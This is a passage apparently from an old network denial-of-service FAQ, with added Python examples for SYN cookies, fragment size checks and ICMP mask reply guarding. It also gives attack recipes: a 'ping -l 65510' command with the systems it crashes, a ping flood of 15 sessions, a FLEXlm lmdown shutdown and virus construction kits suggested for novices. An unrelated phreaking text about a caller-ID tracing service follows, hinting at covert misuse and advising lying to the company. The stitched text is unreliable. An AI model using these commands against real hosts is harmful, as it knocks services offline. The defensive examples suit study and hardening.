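    lines.append("Nov 16 09:51:10 mailhost sendmail[2000]: gAGHp00001: from=<alice@example.net>, "
                 "size=900, class=0, nrcpts=1, proto=ESMTP, relay=mx.example.net [198.51.100.5]")
    lines.append("Nov 16 09:51:11 mailhost sendmail[2000]: gAGHp00001: to=<victim@example.com>, "
                 "delay=00:00:01, mailer=local, stat=Sent")
    return lines


if __name__ == "__main__":
    print(detect_bombing(constructed_log()))   # {('192.0.2.77', 'victim@example.com'): 30}
```

A real log stream is unbounded, so the per-pair deques would need an eviction policy for idle pairs; the sliding-window rule itself is the part worth keeping.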

.C.16. TIME AND KERBEROS
------------------------

If the clocks of the source and target machine are not closely aligned, the ticket will be rejected. That means that if the protocol that sets the time is not protected, it is possible to put a Kerberos server out of function.

.C.17. THE DOT DOT BUG
----------------------

The Windows NT file sharing system is vulnerable to the dot dot bug (dot dot as in ..) made famous under Windows 95, meaning that anyone can crash the system. If someone sends a "DIR ..\" to the workstation, a STOP message will appear on the screen of the Windows NT computer. Note that this applies to versions 3.50 and 3.51, for both the workstation and the server version.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC
-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a getsockopt() is done after a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS
----------------------

A hostile applet is any applet that attempts to use your system in an inappropriate manner. The problems in the Java language can be sorted into two main groups:

 1) Problems due to bugs.
 2) Problems due to features in the language.

In group one we have for example the Java bytecode verifier bug, which makes it possible for an applet to execute any command that the user can execute. This means that all the attack methods described in .D.X. could be executed through an applet. The Java bytecode verifier bug was discovered in late March 1996 and no patch has yet been made available (correct me if I'm wrong!!!).

Note that two other bugs belong in group one, but they are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two is more interesting, and one large problem found is the fact that Java can connect to ports. This means that all the methods described in .C.X. can be performed by an applet. More information and examples can be found at: http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of firewall for protection against Java. As a user you can have Java disabled.

.C.20. VIRUS ------------

Computer virus is written for the purpose of spreading and destroying systems. Virus is still the most common and famous denial of service attack method.

It is a misunderstanding that virus writing is hard: if you know assembly language and have source code for a couple of viruses it is easy. Several automatic toolkits for virus construction can also be found, for example:

 * Genvir.
 * VCS (Virus Construction Set).
 * VCL (Virus Construction Laboratory).
 * PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
 * IVP (Instant Virus Production Kit).
 * G2 (G Squared).

PS-MPC and VCL are known to be the best and can help the novice programmer learn how to write viruses.

An automatic tool called MtE can also be found; MtE transforms a virus into a polymorphic virus. The polymorphic engine of MtE is well known and should easily be caught by any scanner.

.C.21. ANONYMOUS FTP ABUSE
--------------------------

If an anonymous FTP archive has a writable area it can be misused for a denial of service attack similar to .D.3., that is, filling up the hard disk.

A host can also become temporarily unusable under massive numbers of FTP requests.

For more information on how to protect an anonymous FTP site, CERT's "Anonymous FTP Abuses" is a good start.

.C.22. SYN FLOODING
-------------------

Both 2600 and Phrack have posted information about the SYN flooding attack; 2600 has also posted exploit code for it.

As we know, the SYN packet is used in the TCP 3-way handshake. The SYN flooding attack is based on an incomplete handshake: the attacking host sends a flood of SYN packets but never responds with the final ACK. The TCP/IP stack waits a certain amount of time before dropping each half-open connection, so a SYN flooding attack keeps the SYN_RECEIVED connection queue of the target machine full.

The SYN flooding attack is a hot topic and it is easy to find more information about it, for example:

 [.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
       Article by Christopher Klaus, including a "solution".

 [.2.] http://jya.com/floodd.txt
       2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

 [.3.] http://www.fc.net/phrack/files/p48/p48-14.html
       IP-spoofing Demystified by daemon9 / route / infinity for Phrack Magazine
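The following is an added example, written for this page and not code from the FAQ or from the 2600/Phrack articles. It models the SYN_RECEIVED queue described above (a fixed backlog with a per-entry timeout) to show why unanswered SYNs from spoofed sources lock legitimate clients out until the entries expire, and then shows the mitigation that later stacks adopted: SYN cookies, where the server keeps no half-open state and instead encodes the handshake in its initial sequence number. The backlog size, the 75 s timeout (the classic BSD value), the secret key, and all addresses are constructed for the illustration, and the cookie layout is a simplified version of the classic scheme.

```python
"""SYN_RECEIVED queue under a SYN flood, and a SYN-cookie style stateless
alternative. Constructed example, not code from the FAQ; addresses, the
backlog size and the 75 s timeout are illustrative (75 s is the classic BSD
value)."""
import hashlib
import hmac


class HalfOpenQueue:
    """Fixed-size backlog of half-open connections with a per-entry timeout."""

    def __init__(self, backlog=8, timeout=75.0):
        self.backlog = backlog
        self.timeout = timeout
        self.entries = {}                    # (src, sport) -> arrival time

    def _expire(self, now):
        self.entries = {k: t for k, t in self.entries.items()
                        if now - t < self.timeout}

    def on_syn(self, src, sport, now):
        """Return True if the SYN was queued, False if it had to be dropped."""
        self._expire(now)
        if len(self.entries) >= self.backlog:
            return False
        self.entries[(src, sport)] = now
        return True

    def on_ack(self, src, sport, now):
        """Final ACK of the 3-way handshake: the entry leaves the queue."""
        self._expire(now)
        return self.entries.pop((src, sport), None) is not None


def flood_then_legit(queue, flood_syns, now=0.0):
    """Attacker sends flood_syns SYNs from constructed spoofed sources and never
    ACKs; a legitimate client arrives one second later. Returns whether the
    legitimate SYN could be queued."""
    for i in range(flood_syns):
        queue.on_syn(f"198.51.100.{i % 250}", 40000 + i, now)
    return queue.on_syn("192.0.2.10", 51515, now + 1.0)


# --- SYN cookies: keep no state for half-open connections at all -----------
SECRET = b"constructed-server-secret"       # real stacks use a random, rotated key


def syn_cookie(src, dst, sport, dport, minute, mss_index=0):
    """Initial sequence number that encodes the handshake instead of storing it.
    Layout (simplified from the classic scheme): 5 bits of a minute counter,
    3 bits of MSS index, 24 bits of keyed hash over the 4-tuple and counter."""
    t = minute & 0x1F
    m = mss_index & 0x7
    msg = f"{src}|{dst}|{sport}|{dport}|{t}|{m}".encode()
    h = int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")
    return (t << 27) | (m << 24) | h


def check_cookie(ack, src, dst, sport, dport, now_minute, max_age=2):
    """Validate the client's ACK of a cookie SYN+ACK without any queue lookup.
    Rejects stale cookies and any value not produced for this 4-tuple."""
    isn = (ack - 1) & 0xFFFFFFFF
    t = (isn >> 27) & 0x1F
    if (now_minute - t) & 0x1F > max_age:
        return False
    m = (isn >> 24) & 0x7
    expected = syn_cookie(src, dst, sport, dport, t, m)
    return hmac.compare_digest(isn.to_bytes(4, "big"), expected.to_bytes(4, "big"))
```

With a backlog of 8, eight unanswered SYNs are enough to make the ninth, legitimate, SYN fail until the 75 s timeout has passed; with cookies the server answers every SYN and only spends memory once a valid ACK comes back, which a spoofed source never sends.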

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but it might be quite big.

Under Unix we could try something like: ping -s host, to send 64-byte packets.

If you have Windows 95, click the start button, select RUN, then type in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works against Linux kernels 2.0.7 up to 2.0.20 and 2.1.1 (crash); AIX 4, OSF, HP-UX 10.1, DUnix 4.0 (crash); OSF/1, 3.2C, Solaris 2.4 x86 (reboot).
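Why 65510 bytes in particular, and what the patched kernels check: the IP Total Length field is 16 bits, so a datagram may be at most 65535 bytes including its 20-byte header, and 65510 bytes of ping data plus the 8-byte ICMP header already exceed that. The sender splits the oversized datagram into legal-looking fragments, and a receiver that reassembles them without checking the final size writes past its reassembly buffer. The following is an added example, not code from the FAQ: it reproduces the sender's fragmentation arithmetic and the bounds check a correct reassembler applies to each fragment, using RFC 791 field sizes and an Ethernet MTU of 1500 (assumed).

```python
"""Oversized-datagram check for IP fragment reassembly.

Constructed example (not code from the FAQ): shows why a 65510-byte ping
payload is dangerous and the check a reassembler needs. Numbers follow RFC 791;
the 1500-byte MTU is an assumption."""

IP_MAX_TOTAL_LEN = 65535      # 16-bit Total Length field
IP_HEADER_LEN = 20            # minimum IPv4 header
ICMP_HEADER_LEN = 8           # echo request header
FRAG_UNIT = 8                 # fragment offset is counted in 8-byte units


def fragment_payload(payload_len, mtu=1500):
    """Split an IP payload of payload_len bytes into (offset_units, length)
    fragments the way a sender with the given MTU would (all but the last
    fragment carry a multiple of 8 bytes). The sender itself never checks
    whether the pieces add up to a legal datagram; that is the bug."""
    per_frag = (mtu - IP_HEADER_LEN) // FRAG_UNIT * FRAG_UNIT   # 1480 for Ethernet
    frags = []
    offset = 0
    while offset < payload_len:
        length = min(per_frag, payload_len - offset)
        frags.append((offset // FRAG_UNIT, length))
        offset += length
    return frags


def oversized_fragment(offset_units, length):
    """True when this fragment would make the reassembled datagram exceed
    the 65535-byte maximum (header included); a correct stack drops it
    instead of writing past its reassembly buffer."""
    end = offset_units * FRAG_UNIT + length
    return IP_HEADER_LEN + end > IP_MAX_TOTAL_LEN


def first_bad_fragment(frags):
    """Index of the first fragment that must be rejected, or None."""
    for i, (off, length) in enumerate(frags):
        if oversized_fragment(off, length):
            return i
    return None


def ping_payload_is_safe(data_len):
    """data_len is the ICMP data size (the ping -l / ping -s argument)."""
    frags = fragment_payload(ICMP_HEADER_LEN + data_len)
    return first_bad_fragment(frags) is None
```

For 65510 data bytes the 45th fragment starts at offset 65120 and carries 398 bytes, so the datagram would be 65538 bytes and that fragment is the one to drop; 65507 data bytes is the largest size that still fits.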

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
-------------------------------------------------

The ICMP subnet mask reply message is used during reboot, but some hosts are known to accept the message at any time without any check. If so, all communication to or from the host is turned off; it's dead.

The host should not accept the message at any time other than during reboot.
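One way a host's ICMP handler can enforce that rule, as an added example that is not code from the FAQ or from any particular operating system: an address mask reply (ICMP type 18) is applied only while the host is still configuring its interfaces, only if it matches the identifier and sequence number of a request (type 17) the host itself sent, only within a timeout, and only if the mask is a contiguous prefix. The 10 s timeout and the audit list are assumptions made for the illustration.

```python
"""Guarding ICMP Address Mask Reply handling.

Constructed example, not from the FAQ: the host only applies a mask from a
reply that answers a request it sent itself, while it is still booting, and
before the request has timed out. Timeout value is an assumption."""

ICMP_ADDR_MASK_REQUEST = 17
ICMP_ADDR_MASK_REPLY = 18
REPLY_TIMEOUT = 10.0          # seconds a request stays outstanding (assumed)


def valid_mask(mask):
    """A netmask must be a contiguous run of 1s followed by 0s, and not empty."""
    m = mask & 0xFFFFFFFF
    inv = (~m) & 0xFFFFFFFF
    return m != 0 and (inv & (inv + 1)) == 0


class AddressMaskState:
    def __init__(self, booting=True):
        self.booting = booting            # interfaces not yet configured
        self.pending = {}                 # (ident, seq) -> time request was sent
        self.netmask = None
        self.rejected = []                # audit trail: (src, mask, reason)

    def send_request(self, ident, seq, now):
        """Called by the boot code; records which reply we are willing to accept."""
        self.pending[(ident, seq)] = now

    def finish_boot(self):
        """After this, no reply can change the mask, matching the FAQ's rule."""
        self.booting = False
        self.pending.clear()

    def on_icmp(self, icmp_type, ident, seq, mask, src, now):
        """Returns True if the reply was applied, False if it was ignored."""
        if icmp_type != ICMP_ADDR_MASK_REPLY:
            return False
        reason = None
        if not self.booting:
            reason = "not booting"
        elif (ident, seq) not in self.pending:
            reason = "unsolicited"
        elif now - self.pending[(ident, seq)] > REPLY_TIMEOUT:
            reason = "stale"
        elif not valid_mask(mask):
            reason = "non-contiguous or empty mask"
        if reason:
            self.rejected.append((src, mask, reason))
            return False
        del self.pending[(ident, seq)]
        self.netmask = mask
        return True
```

The rejected list is what you would feed to logging: an unsolicited reply arriving on a host that finished booting long ago is exactly the event worth alerting on.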

.C.26. FLEXlm
-------------

Any host running FLEXlm can shut down the FLEXlm license manager daemon on any network using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often uses trivial FTP (tftp) together with RARP or BOOTP. If not protected, an attacker can use tftp to boot the host.

.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





By Trivedi Jay (B E Electrical Engineer )
email : erjaytrivedi@yahoo.com

An Introduction into TeleScan

The Ultimate Skip Tracing Weapon


INTRODUCTION
 What's all the hoopla? Well I've been trying to find a good ANI demo ever since IIRG's went down at the first of the year [800-852-9932]. Well I finally got one from The Mortician. Here it is...
                           8 0 0 . 7 7 5 . 5 5 1 3
 This is an ANI demo provided by a security company called TEL-SCAN(tm). Now ANI is cool and useful and everything, but it isn't hardly worthy of one of my wonderful headers. But see, there's more at stake here. Call the demo and get the ANI info and all that, and if you're a lamer stop there. But if you're kK00l enough, stay on the line and find out more about TEL-SCAN(tm), the company providing the demo.

THE TEL-SCAN(tm) NETWORK

 TEL-SCAN(tm) is a Colorado based Security service that offers an improvised skip-tracing method to Private Investigators, (or anyone with money and a good MO). How it works is this: subscribers are provided with an 800 "Identifier Line" which when called automatically identifies the incoming number and records it into a corresponding Voice Mail Box. The subscriber can then call the Mail Box and it will relay to him all incoming calls to the "Identifier Line". 2-o0 pH_ukYn /<eW/! The possibilities with ANI and VMBs at hand are endless!!!

 TEL-SCAN(tm) can be used as such: Get a bunch of business cards printed with the "Identifier Line" printed as your phone number. If you're looking for someone, leave your card around places where they're likely to get it. When they call, you've got the number they're calling from and possibly an important lead. Voila! Skip-Tracing improvised. Now this of course constitutes intended use. As far as underground use goes...well...you know.


TEL-SCAN(tm) GEOGRAPHICALS

 For more information on TEL-SCAN(tm) write or call:
                    TEL-SCAN(tm)
                    2641 North Taft
                    Loveland, CO  80538
                    Number: 303.663.1703
                    FAX: 303.663.1708

 By the way when you call, you will be asked where you heard about TEL-SCAN(tm). DO NOT say you heard it from me (duh)! Have a good one ready because they will hang up on you if they think something is funny.

TEL-SCAN(tm) PRICES

 This service has a one time activation fee of $67.00 dollars. Thereafter you are charged $5.00 dollars every time the service identifies a number for you. You are billed monthly if applicable, but there are no mandatory monthly fees. Now here's the good part: you can subscribe to the service via FAXed licensing agreement, at which time you will IMMEDIATELY be issued a Mail Box and a "Line Identifier". They will bill you later for the activation fee. Not too shabby, huh?

OUTRODUCTION

 Well that's it, and thanks again to The Mortician at Lies, Hate, and Deception (LHD·) for this one. Look for other oB files (with great headers) labeled as xxxxxxxx.oB. These files can be found at...

 oleBuzzard's kn0wledge phreak   |   sUmthyn lykE 4000+ text fylez  
 AC 303.382.5968--NUP = NO NUP |  hAck/phrEAk/AnArky/vIrII/cArd    
 24oo-14.4ooKiloBaud-Open 24/7  | n0 phUckyn lAmEr wArEz do0dz!  







